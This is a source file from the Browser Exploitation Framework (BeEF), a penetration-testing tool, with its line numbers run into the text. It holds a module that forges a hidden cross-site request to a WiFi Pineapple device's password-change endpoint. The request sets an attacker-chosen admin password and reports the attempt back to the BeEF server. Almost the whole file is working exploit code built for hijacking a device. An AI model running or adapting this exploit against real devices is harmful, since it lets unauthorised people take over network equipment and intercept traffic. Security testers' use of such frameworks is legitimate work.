Path: blob/master/modules/exploits/wifi_pineapple_csrf/command.js
1154 views
//1// Copyright (c) 2006-2025 Wade Alcorn - [email protected]2// Browser Exploitation Framework (BeEF) - https://beefproject.com3// See the file 'doc/COPYING' for copying permission4//56beef.execute(function() {7var gateway = '<%= @base %>';8var passwd = '<%= @password %>';9var timeout = 15;1011var wifi_pineapple_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "/components/system/configuration/functions.php?change_password", "POST", "application/x-www-form-urlencoded", [12{'type':'hidden', 'name':'password', 'value':passwd} ,13{'type':'hidden', 'name':'repeat', 'value':passwd},14{'type':'hidden', 'name':'change_password', 'value':'Change Password'}15]);1617beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");1819cleanup = function() {20document.body.removeChild(wifi_pineapple_iframe_<%= @command_id %>);21}22setTimeout("cleanup()", timeout*1000);2324});25262728